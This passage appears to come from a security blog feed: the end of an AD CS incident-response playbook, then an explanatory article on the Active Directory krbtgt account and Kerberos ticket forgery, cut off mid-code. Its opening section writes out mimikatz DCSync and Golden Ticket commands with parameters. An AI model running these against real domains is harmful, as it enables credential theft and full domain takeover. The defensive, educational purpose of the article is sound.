Note: The Lane-3 CA rebuild operation is the single most important preparatory deliverable in this entire playbook. Run a tabletop exercise: "the CA private key is compromised; what are the steps to a clean state?" If the answer is unclear in the absence of an incident, the answer will be improvised during one -- typically poorly. Build the runbook, identify the operational owners, pre-stage the replacement CA's hardware, and document the certificate inventory you will need to re-issue. The two-week recovery becomes a one-week recovery if the prep is done; the two-week recovery becomes a four-week recovery if it is not.

Lane 4: What does not work

Five operator myths that the catalog refutes by construction:

"Rotating krbtgt closes AD CS." Wrong. Rotating krbtgt closes the symmetric KDC key; it does not touch the asymmetric CA private keys in NTAuthCertificates. An ESC1 certificate presented after the rotation mints a Domain Admin TGT the same way it would have before it.
"Credential Guard protects against ESC." Wrong. Credential Guard's LSAISO isolates LSASS-resident credentials from the rest of the OS. AD CS abuse does not touch LSAISO; the certificate is issued by the CA against a request submitted over a network protocol. The credential never leaves the attacker's machine in a form Credential Guard could isolate.
"Disabling Web Enrollment closes AD CS." Partial. Disabling the AD CS Web Enrollment role service closes ESC8 (the HTTP relay primitive). It does not affect ESC1 through ESC7 (template, ACL, and CA-config attacks), ESC11 (RPC relay), or any of the mapping ESCs. The default RPC enrollment transport on every Enterprise CA is unaffected.
"If we patch CVE-2022-26923 we're done." Wrong. CVE-2022-26923 closes the specific dNSHostName machine-account-impersonation chain. It does not close ESC1, ESC4, or any of the configuration ESCs that the same operator chain could have taken.
"Reset krbtgt twice and we have evicted the attacker." Wrong. The double-krbtgt-reset playbook is well-suited for Golden Ticket eviction. It is not effective against an attacker who has issued a long-validity authentication certificate from a CA the attacker controls or has compromised. The issued certificate authenticates against the new krbtgt the same way it did against the old one, because PKINIT does not bind the certificate's authority to the symmetric krbtgt key.
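The first and last myths share one mechanism, which a toy model makes concrete. The sketch below is an illustration under stated assumptions, not a model of real KDC code: krbtgt keys are reduced to version numbers with a two-slot history, NTAuth is a set of CA names, and every function and field name is hypothetical.

```javascript
// Toy forest: a two-slot krbtgt key history plus the NTAuth-published CAs.
function makeForest(ntAuthCas) {
  return { krbtgtCurrent: 1, krbtgtPrevious: null, ntAuth: new Set(ntAuthCas) };
}

// Each reset shifts the current key into the previous slot.
function resetKrbtgt(forest) {
  forest.krbtgtPrevious = forest.krbtgtCurrent;
  forest.krbtgtCurrent += 1;
}

// A forged TGT validates only if its signing key is still in one of the two slots.
function acceptsForgedTgt(forest, signingKeyVersion) {
  return signingKeyVersion === forest.krbtgtCurrent ||
         signingKeyVersion === forest.krbtgtPrevious;
}

// Certificate logon depends on the issuing CA and revocation, not on krbtgt.
function acceptsCertificate(forest, cert) {
  return forest.ntAuth.has(cert.issuer) && !cert.revoked;
}
```

After two calls to `resetKrbtgt`, `acceptsForgedTgt(forest, 1)` turns false while `acceptsCertificate` returns exactly what it returned before, because nothing in the reset path touches the NTAuth set.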

Run Locksmith this week. Tag NTAuth CAs as Tier Zero in BloodHound. Schedule the Lane 3 rebuild playbook before you need it. The catalog grew faster than the patches; the defender's only working strategy is parallel work in all four lanes.

11. Frequently Asked Questions

The SID extension is on by default for any CA running an OS that has installed KB5014754 or later. The catch is what the *KDC* does with that extension. Switching the KDC to Full Enforcement breaks every certificate that lacks the SID extension, which is why Microsoft built the three-mode staged rollout: the §7 timeline anchors the compatibility window (mechanics and the Feb 11, 2025 / Sep 9, 2025 milestones), and the §9 Callout carries the verbatim KB5014754 dates and the customer compatibility-friction set (legacy SCEP, Intune PKCS, non-Microsoft PKI, third-party smart cards). ESC16 closes the loop in the other direction: an admin (or a compromised admin) can re-disable the extension at the CA level, recreating the weak-mapping condition KB5014754 was designed to close.

Partially. The on-premises ESC catalog enumerates misconfigurations of the on-premises AD CS role. Entra Cloud PKI is a Microsoft-operated SaaS CA whose substrate is not the on-premises AD CS Windows role at all -- so ESCs that abuse on-premises CA registry flags (ESC6, ESC16), on-premises CA DACLs (ESC5, ESC7), or the on-premises transport (ESC8, ESC11) do not transfer directly. But Cloud PKI still issues authentication certificates, still has a template-equivalent administrative surface, and still maps certificates onto AD or Entra principals. The community has not yet published a Cloud PKI ESC catalog; the open question is whether the cross-product of Cloud PKI's primitive surface and its mapping behavior has its own equivalent class of named misconfigurations.

No. A two-tier hierarchy improves protection of the *root* CA's private key (the root signs only the subordinate's certificate and stays offline) but does nothing for the subordinate. The ESC catalog attacks the issuing subordinate, not the root. The misconfigured Enrollee-Supplies-Subject template, the editable `EDITF_ATTRIBUTESUBJECTALTNAME2` registry flag, the per-template DACL, the NTLM-relayable Web Enrollment endpoint -- all live on the subordinate CA. A two-tier hierarchy is the right architecture and is essentially orthogonal to the ESC discussion.

No. Smart cards are *consumers* of certificates issued by AD CS; the smart-card pipeline reads a certificate off the card, presents it to PKINIT, and receives a TGT. AD CS is the *issuing* substrate. Every ESC attacks the issuance side. A smart-card deployment depends on AD CS being correctly configured; it adds no defense against ESC1 through ESC16 and may add complexity in the strong-mapping migration (smart-card-issued certificates may use legacy mappings that break under Full Enforcement).

No. BloodHound CE does not ship a numbered `ADCSESC8` edge. It ships `CoerceAndRelayNTLMToADCS`, an edge representing "a computer can be SMB-coerced to authenticate to an attacker host, and the attacker host can relay that authentication to an ESC8-vulnerable Web Enrollment endpoint on a CA" [@bh-coerce-adcs-edge]. Look for that edge, not for a numbered ESC8 edge. If `CoerceAndRelayNTLMToADCS` paths exist anywhere in the graph, your Web Enrollment endpoint is ESC8-exposed and the operator chain from any coercible computer to a Domain Admin authenticator runs in eight minutes.

ESC12 is treated in the §5 Aside: Knobloch's October 2023 YubiHSM hardware-substrate disclosure (earliest Wayback snapshot dated October 24, 2023), scoped out of the body because the abuse depends on the specific HSM vendor and on shell access to the CA host [@knobloch-esc12] [@knobloch-esc12-archive]. ESC0 does not exist in the SpecterOps catalog; some operator blogs use "ESC0" informally to describe naive enumeration (no abuse, just "the CA is reachable and the template store is readable") but it is not a community-named technique.

KRBTGT: The Account That Owns Active Directory

noreply@paragmali.com (Parag Mali) — Sat, 23 May 2026 00:00:00 GMT

Active Directory's `krbtgt` account is the one secret in any Windows domain whose disclosure forges valid Ticket-Granting Tickets for every principal -- including ones that do not exist. Twelve years of attacks (Golden, Diamond, Sapphire) and Microsoft's responses (the MS14-068 patch, KrbtgtFullPacSignature, the two-reset rotation procedure) converge on one fact: krbtgt rotation invalidates forged TGTs but does not recover the systemic compromise that produced them. That distinction is why confirmed krbtgt compromise is a forest-rebuild event in modern incident-response playbooks, not a key-rotation event.

1. Ninety Seconds to Domain Admin

A single mimikatz kerberos::golden command, with the krbtgt account's AES-256 long-term key in hand, walks the attacker onto any resource in the domain as Administrator. No Domain Admin password was reset. No Domain Admin account was created. No SACL on a sensitive object fired. No LSASS on any host was dumped. No signature-based IDS rule triggered. The attacker holds exactly one cryptographic key -- the long-term key of the RID-502 service account named krbtgt -- and the entire Kerberos trust hierarchy of the domain now accepts whatever they sign [@mitre-t1558001]. The section title's "ninety seconds" is an illustration of how fast the attack is on the wall clock, not a measured demonstration from a published primary.

The operator sequence is short enough to quote. Earlier in the engagement, the attacker ran lsadump::dcsync /user:contoso\krbtgt from a member-server foothold and walked off with the krbtgt long-term key material [@mimikatz]. Then they switched tools to forge a ticket from scratch:

mimikatz # kerberos::golden /domain:contoso.local
                            /sid:S-1-5-21-1004336348-1177238915-682003330
                            /aes256:<key>
                            /user:Administrator /id:500
                            /groups:512,513,518,519,520 /ptt

That single command, documented by Sean Metcalf for operators in 2015 [@adsec-1640], does the forgery in process memory, injects the ticket into the local Kerberos cache (/ptt = pass-the-ticket), and lets the next dir \\dc01\admin succeed.

Count the controls that did not fire while the forged ticket was being minted and presented. No Domain Admin password reset, because the attacker never used a Domain Admin password. No new privileged account, because the attacker impersonated an existing one (RID 500). No SACL on a sensitive object, because the ticket was already approved by the Kerberos trust root before any object was touched. No LSASS dump on a writeable DC, because DCSync is a replication API call, not a memory scrape [@mitre-t1003006]. No IDS hit on a known-malicious payload, because Mimikatz lives in attacker process memory and the wire traffic is, structurally, a TGS-REQ. No anomalous logon time, MFA prompt, or Conditional Access decision, because Kerberos pre-authentication is satisfied by holding a valid TGT and the TGT was minted offline.

The article's load-bearing thesis: within the Kerberos trust root of a single domain, the krbtgt key is the unique secret whose disclosure yields valid TGTs for every principal -- including ones that do not exist. The technical recovery (two-reset rotation) is well-documented [@ms-forest-recovery] and does cryptographically invalidate forged tickets. But the operational recovery from a confirmed krbtgt compromise is a forest-rebuild event for reasons that have nothing to do with the krbtgt key itself.

This produces an apparent contradiction. Microsoft documents a clean two-reset rotation procedure with a ten-hour interval [@ms-forest-recovery]; Mandiant- and SpecterOps-style incident-response playbooks treat confirmed krbtgt compromise as a forest-rebuild event [@specterops-dot2]. Both statements are simultaneously true. The job of the next ten thousand words is to explain why -- starting with what krbtgt actually is. Not the key. Not the protocol. The account itself: RID 502, disabled, indelible.

2. The Account: RID 502, Disabled, Indelible

Open Active Directory Users and Computers on a fresh Windows Server 2022 domain promoted ten seconds ago. In the Users container there is an account called krbtgt. It has no password visible to the admin. It is disabled. Try to enable it -- the checkbox accepts the click, but the next replication cycle puts the account right back into the disabled state. Try to rename it -- the operation appears to succeed, but the objectSID does not change. Try to delete it -- the operation fails outright. You cannot log in as it; the disabled-for-interactive-logon property is enforced inside the Security Accounts Manager. The account exists exactly because the domain exists; the lifetime of the account and the lifetime of the domain are the same lifetime [@ms-default-accounts].

Why does Active Directory ship with an account that no admin can use, no attacker can authenticate as interactively, and no operator can remove?

The krbtgt account is the Kerberos Ticket-Granting Ticket service account that exists, exactly once per Active Directory domain, to hold the long-term cryptographic key the domain controllers use to encrypt and sign every TGT issued in the domain. The account name itself is the Kerberos principal name (`krbtgt/DOMAIN@DOMAIN`) inherited from MIT's 1988 Kerberos v4 design.

Creation. The account is created automatically when the first writeable domain controller is promoted in a new domain. The Microsoft Learn default-accounts page lists it alongside Administrator and Guest as one of the three default local accounts in the Users container, with the verbatim note that "the KRBTGT account can't be enabled in Active Directory" [@ms-default-accounts]. The account's lifecycle is bound to the domain's lifecycle; there is no operator-controllable provisioning of a krbtgt account, and no de-provisioning short of demoting the domain.

RID 502. The relative identifier at the tail of the account's SID (S-1-5-21-<domain>-502) is fixed by the well-known SID specification [@ms-sids]. Sean Metcalf's operator primer confirms the RID-502 binding directly: "Each Active Directory domain has an associated KRBTGT account ... The SID for the KRBTGT account is S-1-5-<domain>-502" [@adsec-483]. RIDs 500 through 1000 are reserved for built-in security principals; 500 is Administrator, 501 is Guest, 502 is krbtgt. Renaming the sAMAccountName cannot move the RID. The KDC service derives its key lookups from the principal name, which binds to the RID, not from the friendly name shown in ADUC. Renaming krbtgt as a defensive measure is a fallacy that the next section will sharpen further.
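Because the binding is to the RID rather than the name, identifying the account from a SID is a string operation. This is a minimal sketch assuming SIDs arrive in the usual `S-1-5-21-...` string form; the function names are hypothetical and the lookup table holds only the three RIDs named above.

```javascript
const WELL_KNOWN_RIDS = { 500: "Administrator", 501: "Guest", 502: "krbtgt" };

// Returns the trailing relative identifier of a domain SID string, or null
// if the string is not of the form S-1-5-21-<a>-<b>-<c>-<rid>.
function ridOf(sid) {
  const match = /^S-1-5-21-\d+-\d+-\d+-(\d+)$/.exec(sid);
  return match ? Number(match[1]) : null;
}

// Maps a SID to its well-known account role, regardless of any rename.
function wellKnownAccount(sid) {
  return WELL_KNOWN_RIDS[ridOf(sid)] || null;
}
```

For the example domain SID used in the cold open, `wellKnownAccount("S-1-5-21-1004336348-1177238915-682003330-502")` resolves to the krbtgt role whatever the sAMAccountName currently reads.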

Each Read-Only Domain Controller has its own krbtgt_<rid> account whose key signs only that RODC's tickets. The full-domain krbtgt account is read-only from the RODC's perspective -- the design property that lets RODCs participate in Kerberos without holding the full-domain trust root [@adsec-483].

Container. CN=Users,DC=<domain>. The standard Users container, not a Tier-0 OU or a Protected Users group. The account is privileged by virtue of its RID, not by virtue of its containership. Moving it into a different container does not change its semantic role to the KDC.

Disabled for interactive logon. Documented verbatim on the Microsoft Learn default-accounts page: "The KRBTGT account can't be enabled in Active Directory" [@ms-default-accounts]. The account is reserved for the KDC service. There is no interactive logon surface attached, no LSA logon-rights grant, no Kerberos pre-authentication path that produces a TGT for the krbtgt account itself. The account exists to provide a key, not to authenticate.

Indelible and unrenamable. Also from the same Microsoft Learn page: "This account can't be deleted, and the account name can't be changed" [@ms-default-accounts]. ADUC will show a renamed display, but the underlying object identity (the RID, the principal name) is fixed by the directory schema and by LsaSrv enforcement on the writeable DCs.

Password. System-generated, unknown to operators by design. Resetting it via ADUC produces a value Active Directory immediately replaces with a fresh system-generated value. The mechanism that produces the current key is therefore not operator-controllable; rotation is the only primitive operators have over the key value [@ms-forest-recovery].

Password history equals 2. Documented verbatim on the AD Forest Recovery page: "The password history value for the krbtgt account is 2, meaning it includes the two most recent passwords" [@ms-forest-recovery]. This is the mechanical foundation for the two-reset procedure Section 7 will dissect. The KDC keeps both a current and a previous key in the krbtgt account; in-flight TGT validation tries both during the brief window after a rotation; one reset retires only the older of the two; a second reset, separated by at least the maximum ticket lifetime, evicts the key the attacker held.
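The two-slot behavior is easy to model. The sketch below is an illustration only: keys are opaque strings, the ticket-lifetime wait between resets is not modeled, and the function names are hypothetical rather than anything the KDC exposes.

```javascript
// Toy krbtgt account with a password history of 2: current and previous key.
function makeKrbtgt(initialKey) {
  return { current: initialKey, previous: null };
}

// A reset shifts the current key into the previous slot and drops the older one.
function resetPassword(account, newKey) {
  account.previous = account.current;
  account.current = newKey;
}

// Ticket validation tries both slots.
function validates(account, ticketKey) {
  return ticketKey === account.current || ticketKey === account.previous;
}

// Walkthrough: the attacker holds "k1".
const account = makeKrbtgt("k1");
resetPassword(account, "k2");
const afterOneReset = validates(account, "k1");  // true: k1 sits in the previous slot
resetPassword(account, "k3");
const afterTwoResets = validates(account, "k1"); // false: k1 has left the history
```

The walkthrough shows why a single reset is insufficient: the stolen key is still one of the two values the KDC tries.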

Where the key lives. The KDC service (kdcsvc.dll) on every writeable DC reads the krbtgt long-term key from ntds.dit at startup and holds it in process memory for ticket signing and validation. Credential Guard's VBS trustlet -- LSAISO -- does not isolate this read on writeable DCs by design: a DC must read the key to issue tickets [@ms-credential-guard] (see also §10 Aside on why Credential Guard skips the DC). This is the structural asymmetry that makes the krbtgt key reachable to any attacker who can compromise a writeable DC (or invoke its replication API remotely), even on a system where Credential Guard is otherwise enforced everywhere else.

We know what the account is now: a non-interactive, indelible, RID-502 service principal with a system-generated, two-slot password history. But the account is just the container. The rest of the article cares about the long-term cryptographic key it holds.

3. The Key: What RFC 4120 and [MS-KILE] Specify

Hand a network capture of a Kerberos AS-REP to a Wireshark dissector. The dissector shows the TGT as a sequence of ASN.1 fields. One field is named enc-part and its content is opaque. The dissector knows the format of what is inside that opaque blob -- an EncTicketPart -- but it cannot show the field values because the blob is encrypted [@rfc4120]. Encrypted under what? Under one key: the long-term key of the principal named krbtgt/CONTOSO.LOCAL@CONTOSO.LOCAL.

The Microsoft specification puts it as plainly as is possible to put it. [MS-KILE] specifies that the KDC encrypts every ticket using the long-term cryptographic key of the krbtgt principal, citing RFC 4120 §5.2.2 [@mskile]. That sentence, more than any other in the Microsoft Open Specifications corpus, is the cryptographic foundation of Active Directory authentication. Every TGT issued by every writeable DC in the domain is encrypted under one key. There is no per-account key, no per-DC key, no rolling subkey. One key, one trust scope.

A Ticket-Granting Ticket (TGT) is the credential the Kerberos Key Distribution Center issues at logon, encrypted under the KDC's own service key (in Windows, the krbtgt account's long-term key), that the client subsequently presents to request service tickets without re-authenticating with a password. RFC 4120 §5.3 defines its fields; [MS-KILE] specifies the Windows wire profile [@rfc4120][@mskile].

The Key Distribution Center (KDC) is the Kerberos service that issues TGTs (the Authentication Service) and exchanges TGTs for service tickets (the Ticket-Granting Service). In Active Directory the KDC runs as `kdcsvc.dll` on every writeable domain controller; it holds the krbtgt long-term key in process memory for the lifetime of the service [@rfc4120].

Inside the encrypted blob

RFC 4120 §5.3 specifies the fields of the EncTicketPart: a session key the KDC generates for this TGT, the client's name, the cross-domain transit path, the timestamps (authtime, starttime, endtime, renew-till), the optional client-address list, and a final field of authorization-data that Windows uses to carry the Privilege Attribute Certificate [@rfc4120].

The Privilege Attribute Certificate (PAC) is the Windows-specific data structure embedded inside the `authorization-data` field of every Kerberos ticket. The PAC carries the user's SID, the SIDs of every group the user belongs to, account restrictions, profile path, logon server, and a small set of cryptographic signatures the KDC computes to bind the structure to the ticket. Defined in [MS-PAC] [@mspac].

The PAC is where the load-bearing security claim of Windows Kerberos lives. RFC 4120 itself does not care about groups; it cares about whether the client can prove identity to a server. The PAC carries the authorization layer Windows needs on top of authentication: which security principal the ticket represents, which groups confer which permissions, which restrictions apply [@mspac]. The first thing a Windows file server does when it receives a service ticket is decode the PAC, read the SIDs, and run the access-check algorithm.

The three signatures inside every PAC

The PAC is integrity-protected by a small set of signatures the KDC computes when it issues the ticket. As of the [MS-PAC] revision 26.0 dated June 10, 2024 [@mspac], a TGT-resident PAC carries three of them:

The PAC server signature. A keyed HMAC computed under the service key. For a TGT the service is krbtgt/DOMAIN, so the server signature is computed under the krbtgt long-term key. For a service ticket the server signature is computed under the service account's long-term key (the file server's machine-account key, for example) [@mspac].
The PAC KDC signature. A keyed HMAC computed under the krbtgt long-term key, signing the bytes of the server signature. This is the pre-2022 anchor of PAC integrity: even if a service holding only its own key could verify the server signature, only the KDC (or anyone holding the krbtgt key) could compute the matching KDC signature. The "pre-2022" framing tracks the deployment of KB5020805's Full PAC Signature, documented in §5 Generation 6 [@kb5020805].
The Full PAC Signature. Added by Microsoft's response to CVE-2022-37967, deployed via KB5020805 starting November 8, 2022 and enforced by default since July 11, 2023 [@kb5020805][@cve-2022-37967]. Computed by the KDC over the entire PAC -- including the older two signatures -- and stored alongside them. Also computed under the krbtgt long-term key.

flowchart TD
    PAC[PAC contents: SIDs, groups, restrictions] --> SSig[Server Signature]
    PAC --> KSig[KDC Signature]
    PAC --> FSig[Full PAC Signature]
    SSig --> KEY["krbtgt long-term key (TGT)"]
    KSig --> KEY
    FSig --> KEY
    KEY --> TGT[EncTicketPart for TGT]
    TGT --> WIRE[AS-REP / TGS-REP on the wire]

This is the architectural fact the rest of the article will refer back to. The addition of the Full PAC Signature did not relocate the trust to a different key. All three PAC signatures on a TGT terminate at the krbtgt long-term key. An attacker who holds the krbtgt key computes all three correctly in the same step. This is the precise technical observation that motivates the Section 5 attack cascade and the Section 7 rotation analysis.

The enctype matrix

The krbtgt account does not hold a single key; it holds a set of keys, one per Kerberos encryption type advertised in msDS-SupportedEncryptionTypes on the account object. RFC 4120 §5.2.9 defines the enctype numbers; common Windows values are AES-256-CTS-HMAC-SHA1-96 (enctype 18), AES-128 (enctype 17), and the legacy RC4-HMAC (enctype 23) [@rfc4120]. AES-256 has been the recommended default for newly-provisioned krbtgt accounts since the Windows Server 2008 R2 / Windows Server 2012 functional levels, though early Windows Server 2008 deployments often required a krbtgt password reset to materialise the AES keys. The post-2017 AES-SHA2 family (enctypes 19 and 20) is defined by IETF but not deployed in mainline Windows production as of [MS-KILE] revision 47.0 dated April 27, 2026 [@mskile].

Encryption type (enctype): A numeric identifier for the cryptographic algorithm and key length used to encrypt a Kerberos message. RFC 4120 §5.2.9 enumerates them; common Windows values are 17 (AES-128), 18 (AES-256), and 23 (the legacy RC4-HMAC). Each principal's long-term key is derived per enctype, so the krbtgt account stores multiple key derivations side by side [@rfc4120].

Each derivation is stored in both current and previous slots; rotating the krbtgt password rederives the entire set for the new password and shifts the outgoing current derivations into the previous slot.
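
The slot behaviour described above can be sketched as a small model. This is an illustration under stated assumptions, not how Active Directory stores keys: `deriveKey`, `provision`, `rotate`, and `keyIsAccepted` are hypothetical names, and the "keys" are labelled strings rather than real key material.

```javascript
// Toy model of the krbtgt key set: one derivation per enctype, each with a
// current and a previous slot. Key strings are labels, not real key material.
const ENCTYPES = { 17: "AES-128", 18: "AES-256", 23: "RC4-HMAC" };

// Hypothetical stand-in for the per-enctype string-to-key derivation.
function deriveKey(password, enctype) {
  return `${ENCTYPES[enctype]}:${password}`;
}

// Build the initial key set: every enctype gets a current key, no previous key.
function provision(password) {
  const slots = {};
  for (const enctype of Object.keys(ENCTYPES)) {
    slots[enctype] = { current: deriveKey(password, enctype), previous: null };
  }
  return slots;
}

// A password reset rederives every enctype and moves the outgoing current
// derivation into the previous slot.
function rotate(slots, newPassword) {
  const next = {};
  for (const enctype of Object.keys(slots)) {
    next[enctype] = {
      current: deriveKey(newPassword, enctype),
      previous: slots[enctype].current,
    };
  }
  return next;
}

// The model accepts a key if it sits in either slot for that enctype.
function keyIsAccepted(slots, enctype, key) {
  const slot = slots[enctype];
  return Boolean(slot) && (key === slot.current || key === slot.previous);
}

const initial = provision("pw0");
const stolenAesKey = initial[18].current;
const afterOneReset = rotate(initial, "pw1");
const afterTwoResets = rotate(afterOneReset, "pw2");

console.log(keyIsAccepted(afterOneReset, 18, stolenAesKey));  // true: still in the previous slot
console.log(keyIsAccepted(afterTwoResets, 18, stolenAesKey)); // false: evicted from both slots
```

The model shows why a single reset leaves a stolen key usable: the stolen derivation simply moves one slot over.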

FAST armoring sits next to, not above, the krbtgt key

RFC 6113 / [MS-KILE] Flexible Authentication Secure Tunneling adds a second key layer for the client-facing pre-authentication exchange, armoring the AS-REQ under a separate channel key derived from a TGT the client already holds. FAST hardens pre-authentication against offline brute-force. It does not change the fact that the TGT's enc-part is encrypted under the krbtgt key on its way back to the client [@mskile]. No Kerberos extension shipped through 2026 moves the TGT's trust anchor anywhere other than the krbtgt long-term key.

Within a Kerberos domain, every TGT reduces to the same key, and that key has a name: krbtgt.

That sentence is the load-bearing claim the rest of the article rests on. The next section explains how a 1988 academic design decision became the cryptographic foundation of every Windows domain alive today.

{`
// Simplified model of the three PAC signatures on a TGT.
// Each signature is a keyed HMAC computed under the krbtgt long-term key.
const pacContents = "SIDs, groups, restrictions";
const krbtgtKey = "<32-byte AES-256 long-term key>";

function hmac(key, data) {
  return key === krbtgtKey
    ? "SIG(" + data + ")" // attacker-with-key computes valid sigs
    : "INVALID"; // attacker-without-key cannot forge them
}

function buildPACBlock(attackerKey) {
  const serverSig = hmac(attackerKey, pacContents);
  const kdcSig = hmac(attackerKey, serverSig);
  const fullPAC = hmac(attackerKey, pacContents + serverSig + kdcSig);
  const validates = [serverSig, kdcSig, fullPAC].every(s => s !== "INVALID");
  return { serverSig, kdcSig, fullPAC, validates };
}

console.log("with krbtgt key :", buildPACBlock(krbtgtKey).validates);
console.log("without krbtgt key:", buildPACBlock("guess-key").validates);
`}

4. Origins: 1988 Athena, RFC 4120, [MS-KILE]

Open the bibliography of RFC 4120 and find an entry tagged [Ste88]: "Steiner, J., Neuman, C., and J. Schiller, 'Kerberos: An Authentication Service for Open Network Systems,' USENIX Conference Proceedings, February 1988" [@rfc4120]. The principal name krbtgt is in that paper. It has been carried forward unchanged through RFC 1510 (1993) [@rfc1510], through Active Directory's February 2000 release, through RFC 4120 (2005) [@rfc4120], through the first [MS-KILE] revision (2007), and into the current [MS-KILE] revision 47.0 dated April 27, 2026 [@mskile]. Thirty-eight years.

What did the 1988 design decision look like, and what has changed about its security properties since?

MIT Project Athena, 1983-1991

Project Athena ran at MIT from 1983 to 1991 as a campus-scale distributed-computing experiment funded primarily by IBM and DEC [@project-athena]. The authentication problem Athena needed to solve was the one every multi-user network has needed to solve since: how do you let thousands of workstations talk to thousands of services without broadcasting cleartext passwords on every connection? Steiner, Neuman, and Schiller presented their answer at the Winter USENIX conference in Dallas in February 1988. Their design introduced the krbtgt principal name and the trust property that one key encrypts every TGT in the Kerberos domain [@athena1988].

The principal name krbtgt predates Active Directory by twelve years. MIT's 1988 USENIX paper used the name, RFC 1510 standardised it in 1993 [@rfc1510], and Windows 2000 inherited it unchanged. There is no Microsoft-specific Kerberos principal naming convention; the convention is IETF.

The design property that one key encrypts every TGT was not framed in 1988 as a security risk. It was framed as a simplification: by giving the TGS one stable identity that issues every TGT, the protocol does not need to negotiate per-session KDC identities or per-server validation paths. The protocol reduces, mathematically, to two questions: did the KDC issue this TGT, and did the TGT permit the subsequent TGS-REQ for this service? Both reduce to "does this signature validate under the krbtgt key?"

From RFC 1510 to [MS-KILE]

John Kohl and Clifford Neuman published RFC 1510 in September 1993, standardising Kerberos version 5 [@rfc1510]. The krbtgt/DOMAIN@DOMAIN principal-name convention carried forward unchanged from Athena. RFC 1510 is the document Microsoft engineers read when they chose Kerberos v5 as the Windows 2000 default authentication protocol; the krbtgt account became part of the AD schema at the Windows 2000 ship date (RTM December 15, 1999; general availability February 17, 2000) [@windows-2000]. The Microsoft Learn default-accounts page binds the two specifications to the same account: "KRBTGT is also the security principal name used by the KDC for a Windows Server domain, as specified by RFC 4120" [@ms-default-accounts].

RFC 4120, published in July 2005 by Neuman, Yu, Hartman, and Raeburn, obsoleted RFC 1510 [@rfc4120]. The principal name carried forward unchanged again. Section 5.3 defines the wire format of a ticket; §6.2 defines the principal-name convention. Microsoft Open Specifications then published the first [MS-KILE] revision in March 2007, documenting the Windows wire profile on top of RFC 4120. The current revision -- 47.0, dated April 27, 2026 -- still says the same thing: the krbtgt long-term key encrypts every TGT [@mskile]. The Microsoft overlay on top of the IETF specification is the AD-account-management surface: RID 502 fixed, password system-generated, password-history-of-2, disabled-for-interactive-logon, automatic provisioning at first-DC promotion [@ms-default-accounts][@ms-forest-recovery].

Every Kerberos domain on the public Internet today has a krbtgt principal in it. The name has not moved in thirty-eight years. Only the AD-specific overlay gives this article its Windows-specific subject; the protocol substrate is older than the attack surface by twenty-six years.

The principal name and the trust property are nearly forty years old. The exploit chain that targets them is twelve. The interesting question is what happened in the twelve years that turned an academic design decision into the most consequential single key in enterprise computing. That story has a beginning at Black Hat USA on August 7, 2014.

5. The Attack Cascade, 2014 to 2024

Six generations of attack span ten years. None of them found a way to forge a TGT without the krbtgt key; the search space is mathematically closed in that direction. What they did instead is get progressively better at hiding the forgery inside genuine-looking wire traffic. By 2022, the forgery and the legitimate TGT are wire-indistinguishable. Here is how that arc unfolded.

gantt
    title Attack and defence generations
    dateFormat YYYY-MM-DD
    axisFormat %Y
    section Attack
    Gen 0 Academic baseline :done, g0, 2000-02-01, 2014-08-05
    Gen 1 MS14-068 PAC forgery :crit, g1, 2014-11-18, 90d
    Gen 2 Golden Ticket :crit, g2, 2014-08-07, 2920d
    Gen 3 Silver Ticket : g3, 2015-01-01, 4000d
    Gen 4 Diamond Ticket :crit, g4, 2022-06-21, 1700d
    Gen 5 Sapphire Ticket :crit, g5, 2022-10-15, 1300d
    section Defence
    MS14-068 patch :done, d1, 2014-11-18, 30d
    MDI alert family :done, d2, 2016-01-01, 800d
    Full PAC Signature audit :done, d3, 2022-12-13, 210d
    Full PAC Signature enforce :done, d4, 2023-07-11, 90d
    Compatibility removed :done, d5, 2023-10-10, 30d

Generation 0 (pre-November 2014): the academic baseline

Two assumptions held for fourteen years between Windows 2000 RTM and Black Hat USA 2014. First, the PAC's two signatures -- the Server Signature and the KDC Signature -- were treated as adequate; the [MS-PAC] specification required the KDC Signature to be a keyed HMAC under the krbtgt key, but Windows KDCs in practice accepted weaker non-keyed checksums on it (CRC32, RSA-MD5) [@mspac][@ms14068]. Second, the long-term krbtgt key was held only on writeable DCs and was considered unreachable to remote attackers because no remote primitive existed to extract it. Both assumptions failed within months of each other. The MS14-068 disclosure broke the first; the productionised DCSync primitive in Mimikatz broke the second.

Generation 1 (November 18, 2014): MS14-068 and CVE-2014-6324

On November 18, 2014, Microsoft published security bulletin MS14-068, "Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)" [@ms14068]. The disclosure: the KDC accepted PAC checksums computed with algorithms that did not actually depend on the krbtgt key. Any authenticated domain user could forge a PAC asserting Domain Admin group membership, present it in a TGS-REQ alongside an otherwise-valid TGT, and the KDC would accept the forgery. The NVD entry for CVE-2014-6324 records that the bug "allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka 'Kerberos Checksum Vulnerability'" [@cve-2014-6324]. CVSS 9.0. Critical for every supported Windows Server SKU. Exploited in the wild within hours of the bulletin.

Discovery credit for MS14-068 appears across Metasploit module authorship, AttackerKB, and several practitioner write-ups as Tom Maddock. The MSRC bulletin verbatim says only "privately reported" and does not name the reporter publicly [@ms14068]. The Maddock attribution is folk knowledge; the MSRC primary does not confirm it.

Microsoft's patch replaced the weak checksum with a real keyed HMAC under the krbtgt key, the same construction the [MS-PAC] document specifies today. The patch was correct: it restored PAC integrity to actual dependence on a real secret. It also, as a side-effect, elevated the krbtgt key from "an important secret in the directory" to "the load-bearing secret of every authentication decision in the domain." From November 18, 2014 onward, an attacker who held the krbtgt key did not just hold a useful credential; the attacker held the one credential with no authority above it for the KDC to check against.

Key idea: The MS14-068 patch was correct -- it restored PAC integrity to dependence on the krbtgt key. Its side-effect was to elevate the krbtgt key from "important" to "load-bearing for every authentication decision in the domain." From November 18, 2014 onward, the krbtgt key was the single secret worth attacking directly.
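
The difference between the pre-patch and post-patch checks can be illustrated with a short sketch. It is a simplified model, not the Windows KDC code path: CRC-32 stands in for the unkeyed checksums named above, HMAC-SHA-256 from Node's `crypto` module stands in for the keyed construction (the real PAC checksum types differ), and the key and PAC strings are placeholders.

```javascript
const crypto = require("crypto");

// Unkeyed checksum: CRC-32 over the PAC bytes. No secret goes in, so anyone
// who can see (or invent) the PAC can compute the matching value.
function crc32(text) {
  let crc = 0xffffffff;
  for (const byte of Buffer.from(text, "utf8")) {
    crc ^= byte;
    for (let bit = 0; bit < 8; bit++) {
      crc = (crc >>> 1) ^ (0xedb88320 & -(crc & 1));
    }
  }
  return (crc ^ 0xffffffff) >>> 0;
}

// Keyed tag: HMAC under a secret. SHA-256 is an illustrative choice only.
function keyedTag(key, text) {
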